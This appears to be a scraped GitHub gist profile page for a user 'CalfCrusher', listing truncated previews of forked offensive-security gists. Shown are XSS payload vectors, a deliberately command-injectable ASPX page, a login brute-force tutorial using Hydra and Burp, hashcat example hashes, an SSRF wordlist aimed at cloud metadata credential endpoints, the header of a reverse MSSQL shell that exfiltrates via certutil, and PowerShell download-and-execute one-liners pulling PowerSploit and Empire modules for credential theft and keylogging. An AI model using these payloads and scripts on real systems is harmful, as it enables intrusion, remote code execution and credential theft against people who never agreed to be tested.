Christopher CalfCrusher

Pwning
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"
height="200"
zoomAndPan="disable"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:space="preserve">
@CalfCrusher
CalfCrusher / xss-image.svg
Created January 10, 2023 14:38 — forked from rudSarkar/xss-image.svg
SVG Image XSS File
CalfCrusher / gist:55e1505e027b48dc5de41e9f65a8069b
Created January 10, 2023 14:46 — forked from sempf/gist:f44714afe0050b83b6e647261d53b43e
666 XSS Vectors collected from the web
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
CalfCrusher / ping.aspx
Created January 11, 2023 15:12 — forked from stasinopoulos/ping.aspx
Simple ASPX application (vulnerable to OS command injections)
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e){
}
string ExcuteCmd(string arg){
ProcessStartInfo psi = new ProcessStartInfo();
CalfCrusher / kali-headless.md
Created January 27, 2023 22:32 — forked from xErik/kali-headless.md
Configuring Headless (no X, GUI) Kali, Running In VirtualBox

Kali Headless Mode Configuration

Disabling the GUI/X/Head

systemctl set-default multi-user.target
systemctl get-default # shows new default mode
reboot
CalfCrusher / tutorial_bruteforce_cookies_csrf_burp_rewrite.txt
Created March 9, 2023 09:49 — forked from intrd/tutorial_bruteforce_cookies_csrf_burp_rewrite.txt
Tutorial - Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewriting macros
## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewriting macros
# @author intrd - http://dann.com.br/ (thx to g0tmi1k)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
## Burp csrf-rewriting macro
- Session handling rules = new macro, tick "Tolerate URL mismatch when matching parameters".
Create a macro rule over method GET, extract a custom parameter w/ parameter name = _csrf,
starting the extraction after the expression value=" and ending at the delimiter ". Configure the scope for the domain and enable it for Proxy.
Open session tracker to test. (On Intruder bruteforce, you need to untick "Make unmodified baseline request".)
- Proxy options = enable Cookie jar for Proxy; if that does not work, enable invisible proxying.

Hashcat Example hashes

Unless otherwise noted, the password for all example hashes is hashcat

| Hash-Mode | Hash-Name | Example |
|-----------|-----------|---------|
| 0 | MD5 | 8743b52063cd84097a65d1633f5c74f5 |
| 10 | md5($pass.$salt) | 01dfae6e5d4d90d9892622325959afbe:7050461 |
CalfCrusher / cloud_metadata.txt
Created May 11, 2023 16:15 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
CalfCrusher / mandros.py
Created May 19, 2023 15:03 — forked from xassiz/mandros.py
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
CalfCrusher / In-memory PS injection.txt
Created May 30, 2023 17:53 — forked from chr0n1k/In-memory PS injection.txt
Some in-memory Powershell injection scripts
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Get-System.ps1');
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Invoke-Inveigh.ps1')
#"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1')
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-VaultCredential.ps1'); Get-VaultCredential
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')